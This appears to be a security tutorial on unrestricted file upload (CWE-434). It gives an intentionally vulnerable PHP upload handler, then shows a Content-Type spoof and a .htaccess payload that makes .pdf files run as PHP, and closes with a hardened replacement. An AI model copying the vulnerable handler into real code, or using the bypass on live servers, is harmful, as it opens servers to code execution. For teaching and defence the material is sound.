Unrestricted File Upload
CWE-434: Unrestricted Upload of File with Dangerous Type
Two restrictions are implemented in our vulnerable file upload application:
- "Content-Type" header validation
- Blacklisting file extensions
Snippets:

<?php
// Vulnerable upload handler: both checks rely on values the client controls.
$fileName = $_FILES['document']['name'];
$fileTmp  = $_FILES['document']['tmp_name'];
$fileType = $_FILES['document']['type'];                 // copied from the request's Content-Type header
$fileExt  = pathinfo($fileName, PATHINFO_EXTENSION);     // last extension of the client-supplied name

$allowedContentType = array("application/x-zip-compressed", "application/msword", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", "application/pdf");
$blacklistExtension = array("html", "htm", "js", "jsb", "mhtml", "mht", "xhtml", "xht", "php", "phtml", "php3", "php4", "php5", "phps", "shtml", "jhtml", "pl", "py", "cgi", "exe", "scr", "dll", "msi", "vbs", "bat", "com", "pif", "cmd", "vxd", "cpl", "ini", "conf", "cnf", "key", "iv");

$validFileType = in_array($fileType, $allowedContentType);          // allowlist on the untrusted header
$hasInvalidFileExtension = in_array($fileExt, $blacklistExtension); // blacklist on the extension

if ($validFileType && !$hasInvalidFileExtension) {
    // Stored under the web root, keeping the original file name and extension
    $fileLocation = "file/" . $fileName;
    $fileLink = '<a href="' . $fileLocation . '">file</a>';
    move_uploaded_file($fileTmp, $fileLocation);
    echo "Your $fileLink has been uploaded successfully!";
} else {
    if (!$validFileType) {
        echo "Content Type of <b>$fileType</b> is not permitted!<br/>";
    }
    if ($hasInvalidFileExtension) {
        echo "File extension of <b>$fileExt</b> is not permitted!";
    }
}
?>
Bypass "Content-Type" Header Validation

Uploading an HTML file directly is rejected with "Content-Type of text/html is not permitted".

A legitimate PDF upload carries Content-Type: application/pdf in its multipart part:
Content-Disposition: form-data; name="document"; filename="invoice.pdf"
Content-Type: application/pdf

Edit the Content-Type of the HTML upload from text/html to application/pdf:
Content-Disposition: form-data; name="document"; filename="testupload.html"
Content-Type: application/pdf

We succeed in bypassing the Content-Type check! However, the application notices that the extension is not compliant.
Bypass Blacklisting File Extensions
We try all possible extensions and find that the .htaccess extension is permitted.

Only the invalid content-type error message is shown.

Upload a .htaccess file with the following content:
AddType application/x-httpd-php .pdf
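Both bypasses above work because the handler trusts the client's Content-Type header and blacklists extensions. The following is an added example of a hardened replacement, not code from the post: it allowlists extensions, sniffs the real file type from its contents, and generates the stored file name on the server. It assumes the same "document" form field and a hypothetical $uploadDir that the web server does not serve or execute as PHP.

```php
<?php
// Added example (not the post's code): hardened upload check.
function validateUpload(array $file, string $uploadDir): array
{
    // Allowlist: each permitted extension is tied to the MIME type(s) its contents must have.
    // Assumption: libmagic reports DOCX either as its OOXML type or as plain zip.
    $allowed = [
        'pdf'  => ['application/pdf'],
        'zip'  => ['application/zip', 'application/x-zip-compressed'],
        'docx' => ['application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/zip'],
    ];

    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return [false, 'upload failed', null];
    }

    // Only the last extension is used, and only to look up the allowlist;
    // the client-supplied name and Content-Type header are never trusted.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return [false, "extension '$ext' is not permitted", null];
    }

    // Sniff the actual content type instead of reading $_FILES[...]['type'].
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $sniffed = $finfo->file($file['tmp_name']);
    if (!in_array($sniffed, $allowed[$ext], true)) {
        return [false, "content ($sniffed) does not match .$ext", null];
    }

    // Server-generated name: no user input and a single known extension,
    // so names such as ".htaccess" or "x.pdf.php" can never reach the disk.
    $safeName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $safeName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return [false, 'could not store file', null];
    }
    return [true, 'ok', $safeName];
}

// Usage with the form field name from the post; $uploadDir is an assumed path outside the web root.
$upload = $_FILES['document'] ?? ['error' => UPLOAD_ERR_NO_FILE, 'tmp_name' => '', 'name' => ''];
[$ok, $reason, $name] = validateUpload($upload, __DIR__ . '/../uploads');
echo $ok ? 'Stored as ' . htmlspecialchars($name) : 'Rejected: ' . htmlspecialchars($reason);
```

The stored file is only ever reachable through a download handler that sets its own Content-Type from the allowlist, so an uploaded .htaccess or PHP file would have no directory to take effect in.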